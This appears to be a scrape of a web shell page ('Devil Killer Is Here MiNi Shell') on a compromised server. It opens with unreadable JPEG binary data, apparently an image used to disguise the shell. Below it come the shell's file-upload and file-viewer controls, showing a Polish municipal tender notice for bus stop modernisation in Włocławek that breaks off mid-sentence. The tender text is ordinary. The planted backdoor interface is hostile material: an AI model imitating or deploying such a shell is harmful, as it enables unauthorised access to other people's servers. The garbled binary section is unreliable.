JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250820/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250820/0038314401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa funkcjonowania transportu zbiorowego w mieście Włocławek poprzez modernizację infrastruktury towarzyszącej transportowi zbiorowemu I ETAP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO WŁOCŁAWEK - Urząd Miasta Włocławek</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866910</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielony Rynek 11/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włocławek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (54) 414 40 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.wloclawek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wloclawek.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa funkcjonowania transportu zbiorowego w mieście Włocławek poprzez modernizację infrastruktury towarzyszącej transportowi zbiorowemu I ETAP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3595e1b7-24db-4893-a87c-ad6bf0d42538</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00383144</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00065448/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Poprawa funkcjonowania transportu zbiorowego w mieście Włocławek poprzez modernizację infrastruktury towarzyszącej transportowi zbiorowemu I ETAP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Umowa nr UM_WR.431.3.079.2025 projekt: „Poprawa funkcjonowania transportu zbiorowego w mieście Włocławek poprzez modernizację infrastruktury towarzyszącej transportowi zbiorowemu I ETAP” nr FEKP.03.02-IZ.00-0011/24 współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramachprogramu Fundusze Europejskie dla Kujaw i Pomorza 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umwloclawek.logintrade.net/zapytania_email,207265,611c2a09f8f0fa9fa0fda5464a9e1662.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W prowadzonym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>Przetargowej Urzędu Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html oraz<br/>za pomocą poczty elektronicznej, z zastrzeżeniem pkt. 3.<br/>3. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego prawidłowe złożenie na Platformie<br/>Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, w<br/>wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem.<br/>4. Korespondencję związaną z prowadzonym postępowaniem można również kierować na następujący adres poczty elektronicznej<br/>Zamawiającego: zamowienia@um.wloclawek.pl, z zastrzeżeniem pkt. 3.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy<br/>Przetargowej Urzędu Miasta Włocławek przez Wykonawcę jest bezpłatne.<br/>2. Instrukcja korzystania z Platformy Przetargowej Urzędu Miasta Włocławek dostępna jest pod adresem:<br/>https://umwloclawek.logintrade.net/rejestracja/instrukcje.html.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Urzędu Miasta Włocławek ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na<br/>zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Urzędu Miasta Włocławek:<br/>1) dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>b) Google Chrome 31,<br/>c) Mozilla Firefox 26,<br/>d) Opera 18;<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet,<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>c) włączona obsługa JavaScript,<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>e) zainstalowany Acrobat Reader,<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.,<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.,<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies S.A.,<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.;<br/>4) dopuszczalne formaty przesyłanych danych: Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji<br/>elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 rozporządzenia<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.). Równocześnie Zamawiający rekomenduje na format danych<br/>przesyłanych plików: *.pdf.<br/>5) maksymalny rozmiar pojedynczego pliku: 150 MB, przy czym nie określa się limitu liczby plików.<br/>5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej. Adres poczty elektronicznej<br/>Zamawiającego to: zamowienia@um.wloclawek.pl.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>7. Zamawiający zaleca, aby nazwa plików lub katalogów przesyłanych Zamawiającemu przy użyciu Platformy Przetargowej Urzędu<br/>Miasta Włocławek, dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html, oraz za pomocą pocztyelektronicznej zawierała maksymalnie 50 znaków.<br/>8. W przypadku niezastosowania się przez Wykonawcę do zalecenia Zamawiającego, o którym mowa w pkt. 7, Wykonawca<br/>przyjmuje na siebie wyłączne ryzyko braku możliwości otwarcia przez Zamawiającego przesłanego pliku lub katalogu, a tym samym<br/>ryzyko braku możliwości zapoznania się przez Zamawiającego treścią przesłanego pliku lub katalogu.<br/>9. Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.ZP.271.35.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2375066,95 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 1: Przebudowa przystanku Lunewil 01 oraz Lunewil 02<br/><br/>1). Przystanek Lunewil 01 dawna nazwa Okrzei-Kapitulna [104]<br/><br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym<br/>b)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 2 modułowej <br/><br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 145 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 175 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>a)	długość kanału technologicznego: ok. 22 m (wraz z trzema studniami);<br/><br/>2). Przystanek Lunewil 02 dawna nazwa Okrzei-Lunewil [74]<br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>b)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym,<br/>c)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 2 modułowej <br/>6)	nasadzenia drzew – 4 szt.<br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 205 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 78 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>c)	długość kanału technologicznego: ok. 22 m (wraz z trzema studniami);<br/><br/>Przedmiot zamówienia obejmuje również przeniesienie wiaty z przystanku Lunewil 02 (074) na przystanek Broniewskiego 01 (295) (likwidacja starej wiaty z przystanku Broniewskiego 01) oraz przeniesienie wiaty z przystanku Lunewil 01 (104) na przystanek Broniewskiego 02 (297) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 429212,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44212321-5 - Wiaty autobusowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 2: Przebudowa przystanku Wronia Wiadukt 01 oraz Wronia Wiadukt 02.<br/>1). Przystanek Wronia Wiadukt 01 dawna nazwa Wronia -Rakutowska [173]<br/><br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym<br/>c)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 4 modułowej <br/>6)	Wykonanie muru oporowego <br/>7)	Wykonanie schodów <br/><br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 163 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 335 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>c)	długość kanału technologicznego: ok. 74 m (wraz z pięcioma studniami);<br/><br/>2). Przystanek Wronia Wiadukt 02 dawna nazwa Wronia -Wolność [142]<br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym,<br/>b)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 4 modułowej <br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 134 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 374 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>c)	długość kanału technologicznego: ok. 74 m (wraz z trzema studniami);<br/><br/>Przedmiot zamówienia obejmuje również przeniesienie wiaty z przystanku Wronia – Wiadukt 01 (173) na przy-stanek Mielęcińska 01 (168) (likwidacja starej wiaty z przystanku Mielęcińska oraz przeniesienie wiaty z przystanku Wronia – Wiadukt 02 (142) na przystanek Traugutta 01 (187) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 742432,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44212321-5 - Wiaty autobusowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Najdłuższy okres gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie (część) nr 3: Przebudowa przystanku Brzeska 01 oraz przystanku Centrum Kultury Browar B 02<br/>1). Przystanek Brzeska 01 dawna nazwa Brzeska [18]<br/><br/> Przedmiot zamówienia obejmuje kompleksowe wykonanie zatoki autobusowej, chodników wraz z:<br/>a)	wszystkimi robotami przewidzianymi w dokumentacji projektowej do realizacji w pasie drogowym<br/>b)	budową kanału technologicznego na odcinku przebudowy<br/><br/>Przedmiot zamówienia obejmuje w szczególności:<br/>1)	przebudowę zatoki autobusowej o nawierzchni z betonu cementowego;<br/>2)	przebudowę chodników peronów o nawierzchni z kostki betonowej;<br/>3)	budowę kanału technologicznego;<br/>4)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego;<br/>5)	montaż modułowej wiaty przystankowej - 2 modułowej <br/>Przybliżone pole powierzchni projektowanych powierzchni zagospodarowania terenu przedstawia się następu-jąco:<br/>a)	powierzchnia zatoki o nawierzchni z betonu cementowego: ok 106 m2,<br/>b)	powierzchnia chodników i peronu o nawierzchni z kostki betonowej: ok. 56 m2,<br/><br/>Przybliżona długość projektowanych elementów infrastruktury technicznej przedstawia się następująco:<br/>c)	długość kanału technologicznego: ok. 25 m (wraz z czterema studniami);<br/><br/>UWAGA:<br/><br/>Lokalizacja inwestycji w strefie ochrony archeologicznej Dzielnicy Starego Miasta Włocławek, 